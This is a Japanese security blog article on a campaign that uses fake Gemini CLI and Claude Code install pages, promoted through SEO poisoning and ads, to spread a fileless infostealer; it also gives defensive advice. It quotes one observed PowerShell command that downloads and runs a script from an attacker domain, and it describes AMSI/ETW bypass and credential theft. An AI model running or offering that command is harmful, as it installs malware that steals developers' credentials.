セキュリティ企業EclecticIQは2026年5月21日、Google Gemini CLIおよびAnthropic Claude Codeの公式インストールページを精巧に模倣した偽サイトをSEOポイズニング(検索エンジン操作)とGoogle Ads(有料広告)の双方を組み合わせて検索上位に誘導し、開発者にメモリ内で動作するインフォスティーラーを感染させる活発なキャンペーンの全貌を公式レポートとして公開しました。
本キャンペーンは2026年3月上旬から開始され、独立セキュリティ研究者の@g0njxa氏が2026年4月21日に最初に発見してXで報告しました。EclecticIQの分析は単一の金銭目的の脅威アクターが、Gemini CLIとClaude CodeだけにとどまらずNode.js・Chocolatey・KeePassXC・Moneroを含む30以上の悪意あるドメインを2026年3月〜4月にかけて集中登録していることを明らかにしており、AI開発ツールへの信頼を悪用したより広い開発者環境侵害キャンペーンの一部として位置づけられます。
この記事のサマリー
発見・報告:独立研究者@g0njxa(2026年4月21日)→EclecticIQが全容調査(2026年5月21日レポート公開)
攻撃手法:①SEOポイズニング(キーワードスタッフィング・プライベートリンクネットワーク・人工的クリック水増し)+②**Google Adsスポンサー掲載(InstallFixキャンペーン)**の二重チャンネル
標的:米国・英国を中心とした開発者(Gemini CLI・Claude Codeの新規インストール検索者)
偽ドメイン(悪意あるもの):geminicli[.]co[.]com・gemini-setup[.]com・claudecode[.]co[.]com・claude-setup[.]com
拡大ドメイン群:Node.js・Chocolatey・KeePassXC・Monero等を偽装した30以上の関連ドメイン
C2・外部送信先:events[.]ms709[.]com・events[.]msft23[.]com(暗号化データの送信先)
マルウェアの特徴:完全なメモリ内実行(ファイルレス)・ETW(Event Tracing for Windows)の無効化・AMSI(Antimalware Scan Interface)バイパス・正規のGemini CLIをnpm経由でインストールしながら裏で実行(カモフラージュ)
窃取される情報:OAuthトークン・CI/CDパイプライン認証情報・VPN設定・Slack/Teams/Discord/Telegramのセッションクッキー・Chromiumブラウザ保存認証情報(Google ABEバイパス済み)・機密ファイル
感染ルートのコンペア:キャリアとは別に「InstallFix」と呼ばれる関連キャンペーンがGoogle Adsを悪用してClaude Code偽インストールページへのスポンサー掲載を実施
なぜ「AIツールのインストール」が狙われるのか—攻撃対象として最適な理由
EclecticIQがこのキャンペーンを「AI developer toolingを標的としたサプライチェーン型eCrimeの計算された escalation(加速的増大)」と評価する理由を理解するには、攻撃対象として開発者が選ばれた背景を知る必要があります。
「新しいツールは公式サイト以外から情報を探す」という行動特性として、Gemini CLIやClaude Codeは2026年時点でも急速に進化する新しいツールであり、開発者は機能・インストール方法・トラブルシューティングについて検索エンジンを多用します。成熟した製品のように「必ず公式サイトから直接インストールする」という習慣が根付いていません。
「コピー&ペーストでインストールコマンドを実行する」という開発者の文化として、npm・pip・HombrewなどのパッケージマネージャーやCLIツールのインストールは、公式ドキュメントからコマンドをコピーして実行するという作法が普及しています。この習慣が今回の攻撃の核心です。攻撃者は「公式ドキュメントと見分けがつかない偽サイト上に悪意あるコマンドを置く」だけで、開発者が自らマルウェアを実行します。
「開発者の端末には組織の機密情報が集中している」という標的価値として、開発者のPCにはGitHubのPersonal Access Token・AWS IAMキー・CI/CD secret・VPNクレデンシャル・Slackセッション等、組織全体のインフラに到達できる「マスターキー」が多数存在します。1台の開発者端末の侵害が組織全体の侵害につながりやすい構造です。
攻撃の全技術的フロー
Step 1:SEOポイズニングとGoogle Adsによる検索上位への誘導
EclecticIQのレポートによれば、攻撃者は以下の手法を組み合わせて偽サイトを検索結果上位に誘導しています。
**SEOポイズニング(ブラックハットSEO)**として、キーワードの大量埋め込み(keyword stuffing)・プライベートリンクネットワーク(PBN)による被リンク操作・人工的なクリック水増しによってGoogleの検索順位アルゴリズムを操作します。その結果、「Gemini CLI」を検索すると公式ドキュメントよりも上位にgeminicli[.]co[.]comが表示される状態を作り出しました。
**InstallFixキャンペーン(Google Ads悪用)**として、GBHackersが別途追跡している「InstallFix」と呼ばれる関連キャンペーンは、Googleの有料広告(スポンサー掲載)として偽Claude Codeインストールページを上位に表示させます。「検索結果の上位=信頼できる」という認識を持つユーザーが、スポンサーマークに気づかずに偽サイトへ誘導されます。
Step 2:偽ドキュメントとコピー&ペースト誘導
偽サイト(geminicli[.]co[.]com・claudecode[.]co[.]com等)は公式のGemini CLI・Claude Codeのインストールドキュメントをピクセル単位でクローンしています。LetsDataScience・GBHackersの分析によれば、正規のインストール手順との唯一の違いは「単一のPowerShellコマンドを実行する」という指示です。
Step 3:PowerShellによるメモリ内インフォスティーラーの実行
開発者がコマンドをコピーしてPowerShell/ターミナルで実行すると、以下の処理が行われます。
# 実際に観測された悪意あるコマンドの形式(実行しないこと)
# gemini-setup[.]com または claude-setup[.]com から
# PowerShellスクリプトを取得して実行
powershell -c “iex (iwr gemini-setup[.]com/install.ps1).Content”
このコマンドはステージングサーバーから第二段階のPowerShellスクリプトを取得・実行します。GBHackersの詳細分析によれば、このスクリプトは以下の処理を行います。まずWindows Defenderの主要な検知機能を無効化します。具体的にはETW(Event Tracing for Windows)へのパッチ適用によりログ記録を抑制し、AMSI(Antimalware Scan Interface)をバイパスしてセキュリティソフトのスキャンを回避します。次にインフォスティーラーのペイロードを完全にメモリ内で実行(ファイルレス実行)し、ディスク上に痕跡を残しません。正規のGemini CLIをnpm経由でインストールすることで、ユーザーに「インストールが成功した」と思わせながらバックグラウンドでデータを窃取します。
Step 4:Google ABEのバイパスとブラウザ認証情報の窃取
HackReadの詳細報道によれば、地理的な標的リスト内の地域にいる場合、マルウェアはChrome・Edge・Brave・Vivaldi・Opera等のChromiumブラウザを対象に高度な窃取を行います。Google ABE(Application-Bound Encryption)のバイパスのため2026年3月24日にコンパイルされたpayload_x64.binを使用します。これはプロセスホローイング(正規プロセスを起動して停止させ、メモリ内のコードを悪意あるコードに置き換える手法)によってライブブラウザプロセスに注入されます。さらにIElevator2 COMインターフェイスを利用してブラウザのElevation Serviceに保存された認証情報の復号を行います。
Step 5:データの暗号化と外部送信
窃取されたデータは暗号化されてC2サーバー(events[.]ms709[.]com・events[.]msft23[.]com等)に送信されます。「msft」や「ms709」という命名はMicrosoftを連想させる偽装です。EclecticIQの分析によれば、このインフォスティーラーは認証情報の窃取にとどまらず任意のリモートコード実行能力も持っており、金銭目的のオペレーターが特定の被害者に対して「ハンズオンキーボード(手動での操作)侵入」に移行する基盤も提供します。
窃取される情報の全貌
EclecticIQ・GBHackers・CyberSecurityNewsの分析が示す、インフォスティーラーが収集する情報の範囲は以下の通りです。
開発者・DevOps系として、GitHubのPersonal Access Token・AWS/GCP/AzureのIAMキーおよびAPI鍵・CI/CDパイプラインのシークレット(GitHub Actions・GitLab CI・Jenkins等)・Kubernetesのkubeconfigファイル・SSHプライベートキーが対象です。通信・コラボレーション系として、Slackのセッショントークン・Microsoft Teamsのセッションクッキー・Discord・Telegram・その他コラボレーションツールの認証情報が窃取されます。ブラウザ保存情報として、Chromiumファミリーブラウザ(Chrome・Edge・Brave等)に保存されたパスワード・Cookieストア・支払い情報・セキュリティキーが対象です。VPNとネットワークとして、VPNクライアントの設定ファイルおよび認証情報が含まれます。機密ファイルとして、デスクトップ・ドキュメントフォルダ等の機密性の高いファイルも対象となっています。
関連する30以上の悪性ドメイン群——AI以外にも拡大
CyberSecurityNewsとEclecticIQのパッシブDNS解析によれば、攻撃者はgeminicli[.]co[.]com・claudecode[.]co[.]comを軸に、2026年3月末〜4月初めという短期間に30以上の関連ドメインを一斉登録しています。以下はEclecticIQが確認した主な偽装対象です。
AI系としてgeminicli[.]co[.]com・claudecode[.]co[.]com等が確認されています。開発ツール系としてNode.js(公式サイトを偽装)・Chocolatey(Windowsのパッケージマネージャーを偽装)が対象です。セキュリティツール系としてKeePassXC(パスワードマネージャーを偽装)が含まれます。仮想通貨系としてMoneroウォレット(暗号資産ユーザーを狙った偽ウォレットサイト)が確認されています。
この広範な偽装対象の多様性は、本キャンペーンが特定製品への依存ではなく「開発者・技術系ユーザーが新しいツールをインストールする行動」そのものを標的にした、体系的なキャンペーンであることを示しています。
日本の開発者・エンジニアへの注意事項
本キャンペーンの主な標的は米国・英国とされていますが、SEOポイズニングの特性上、日本語のGoogle検索でもヒットする可能性があります。特に以下の状況で注意が必要です。
英語のドキュメントを参照しながら新しいAI開発ツール(Gemini CLI・Claude Code等)をインストールしようとしている場合は要注意です。検索結果から辿ったページのURLがgeminicli.com・anthropic.comの正規ドメインと異なる場合は一切操作しないでください。また、Google検索の「スポンサー」マークが付いた広告からのリンクは特に慎重に確認してください。
開発者が今すぐ実施すべき対策
①常に公式URLからインストールする習慣をつけるとして、Gemini CLIの公式インストールはhttps://geminicli.com・Claude Codeはhttps://www.anthropic.com/product/claude-codeの公式ドキュメントを直接ブックマークしておき、検索エンジンを経由しないようにしてください。
②コピー&ペーストコマンドを実行前にテキストエディタで確認するとして、ウェブページからコピーしたコマンドには見えない文字や意図しないコードが含まれる場合があります。実行前に必ずテキストエディタに貼り付けて内容を確認してください。
③組織のCI/CD・クラウドアクセスキーを定期的にローテーションするとして、仮に開発者端末が侵害された場合でも、定期的なキーローテーションによって被害を最小化できます。
④EDR(エンドポイント検知・対応)ソリューションの導入・最新化として、本マルウェアはETWとAMSIを無効化しますが、最新のEDRソリューションはこれらのバイパス試行自体を検知する能力を持っています。
FAQ
Q. 本キャンペーンで使用されているインフォスティーラーの名前は何ですか? A. EclecticIQのレポートでは特定の名前は付けられていませんが、ファイルレスのPowerShellベースのインフォスティーラーとして分析されています。類似の手法を用いるStealc・Lumma Stealer・Vidar等との関連性が一部で指摘されていますが、確定的な帰属は発表されていません。
Q. すでにGemini CLIやClaude Codeをインストールしている場合、感染しているかどうかはどう確認できますか? A. インストール時に使用したコマンドのURL(gemini-setup[.]com・claude-setup[.]com等が含まれていないか)を確認してください。不明な場合は、ブラウザに保存された認証情報のパスワード変更・クラウドAPIキーのローテーション・セッションクッキーの全無効化(全デバイスからサインアウト)を実施してください。また組織のSOCチームにEDRログでpowershell -c iexパターンを含むプロセスの実行履歴がないかを調査依頼してください。
Q. macOS・Linux環境も対象になりますか? A. EclecticIQのレポートで詳述されているペイロードはWindows環境(PowerShell・Chromiumブラウザ・Google ABEバイパス)を対象にしています。ただし偽サイト自体はmacOS・Linux環境の開発者も誘導する可能性があるため、インストール時のURL確認は全プラットフォームで必要です。
参考情報(1次ソース)
この記事をシェアする
メールマガジン
最新のセキュリティ情報やセキュリティ対策に関する情報をお届けします。
投稿者:三村
セキュリティ製品を手がける上場企業にて、SOC(セキュリティオペレーションセンター)運営およびWebアプリケーション脆弱性診断の営業に8年間従事。その後、システムエンジニアへ転身し、MDMや人事系SaaSの開発に携わる。
8年の実務経験と開発者としての知見を活かし、「セキュリティ対策Lab」ではダークウェブ調査、セキュリティインシデントの分析、および高度なセキュリティ対策解説の執筆・編集を統括しています。
LinkedIn(外部サイト)